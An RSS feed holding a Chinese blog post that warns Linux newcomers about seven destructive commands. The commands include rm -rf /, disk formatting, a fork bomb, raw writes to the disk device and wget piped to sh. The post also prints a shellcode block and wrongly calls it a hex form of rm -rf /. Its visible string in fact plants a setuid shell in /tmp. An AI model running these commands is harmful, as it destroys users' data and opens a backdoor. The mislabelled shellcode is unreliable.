<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title><![CDATA[向东博客 专注WEB应用 构架之美 --- 构架之美，在于尽态极妍 | 应用之美，在于药到病除]]></title> 
<link>http://jackxiang.com/index.php</link> 
<description><![CDATA[赢在IT，Playin' with IT,Focus on Killer Application,Marketing Meets Technology.]]></description> 
<language>zh-cn</language> 
<copyright><![CDATA[向东博客 专注WEB应用 构架之美 --- 构架之美，在于尽态极妍 | 应用之美，在于药到病除]]></copyright>
<item>
<link>http://jackxiang.com/post//</link>
<title><![CDATA[7 个致命的 Linux 命令]]></title> 
<author>jack &lt;xdy108@126.com&gt;</author>
<category><![CDATA[WEB2.0]]></category>
<pubDate>Mon, 14 Jun 2010 03:56:27 +0000</pubDate> 
<guid>http://jackxiang.com/post//</guid> 
<description>
<![CDATA[ 
	如果你是一个 Linux 新手，在好奇心的驱使下，可能会去尝试从各个渠道获得的命令。以下是 7 个致命的 Linux 命令，轻则使你的数据造成丢失，重则使你的系统造成瘫痪，所以，你应当竭力避免在系统中运行它们。<br/>1.rm -rf / 此命令将递归并强制删除 / 目录下的所有文件。<br/>2.char esp[] __attribute__ ((section(&quot;.text&quot;))) /* e.s.p<br/>release */<br/>= &quot;&#92;xeb&#92;x3e&#92;x5b&#92;x31&#92;xc0&#92;x50&#92;x54&#92;x5a&#92;x83&#92;xec&#92;x64&#92;x68&quot;<br/>&quot;&#92;xff&#92;xff&#92;xff&#92;xff&#92;x68&#92;xdf&#92;xd0&#92;xdf&#92;xd9&#92;x68&#92;x8d&#92;x99&quot;<br/>&quot;&#92;xdf&#92;x81&#92;x68&#92;x8d&#92;x92&#92;xdf&#92;xd2&#92;x54&#92;x5e&#92;xf7&#92;x16&#92;xf7&quot;<br/>&quot;&#92;x56&#92;x04&#92;xf7&#92;x56&#92;x08&#92;xf7&#92;x56&#92;x0c&#92;x83&#92;xc4&#92;x74&#92;x56&quot;<br/>&quot;&#92;x8d&#92;x73&#92;x08&#92;x56&#92;x53&#92;x54&#92;x59&#92;xb0&#92;x0b&#92;xcd&#92;x80&#92;x31&quot;<br/>&quot;&#92;xc0&#92;x40&#92;xeb&#92;xf9&#92;xe8&#92;xbd&#92;xff&#92;xff&#92;xff&#92;x2f&#92;x62&#92;x69&quot;<br/>&quot;&#92;x6e&#92;x2f&#92;x73&#92;x68&#92;x00&#92;x2d&#92;x63&#92;x00&quot;<br/>&quot;cp -p /bin/sh /tmp/.beyond; chmod 4755<br/>/tmp/.beyond;&quot;;<br/>这是 rm -rf / 的 hex（十六进制）版本，很能迷惑 Linux 用户。<br/>3.mkfs.ext3 /dev/sda 这将对硬盘进行重新格式化，自然，硬盘上的所有数据将灰飞烟灭。<br/>4.:()&#123; :&#124;:&amp; &#125;;: 著名的 fork 炸弹，此命令将告诉你的系统执行海量的进程，直到你的系统僵死。<br/>5.any_command &gt; /dev/sda 使用该命令，原始数据将被写到块设备，其结果是造成数据丢失。<br/>6.wget http://some_untrusted_source -O- &#124; sh 不要从不信任的地方下载东西，这可能会获取恶意代码。<br/>7.mv /home/yourhomedirectory/* /dev/null 此命令将移动主目录中的所有文件到一个不存在的地方，你将再也看不到那些文件。<br/>如果你认为还有其他致命的 Linux 命令，那么请在留言中告诉我们。<br/><br/>来源：http://linuxtoy.org/archives/the-7-deadly-linux-commands.html
]]>
</description>
</item><item>
<link>http://jackxiang.com/post//#blogcomment</link>
<title><![CDATA[[评论] 7 个致命的 Linux 命令]]></title> 
<author> &lt;user@domain.com&gt;</author>
<category><![CDATA[评论]]></category>
<pubDate>Thu, 01 Jan 1970 00:00:00 +0000</pubDate> 
<guid>http://jackxiang.com/post//#blogcomment</guid> 
<description>
<![CDATA[ 
	
]]>
</description>
</item>
</channel>
</rss>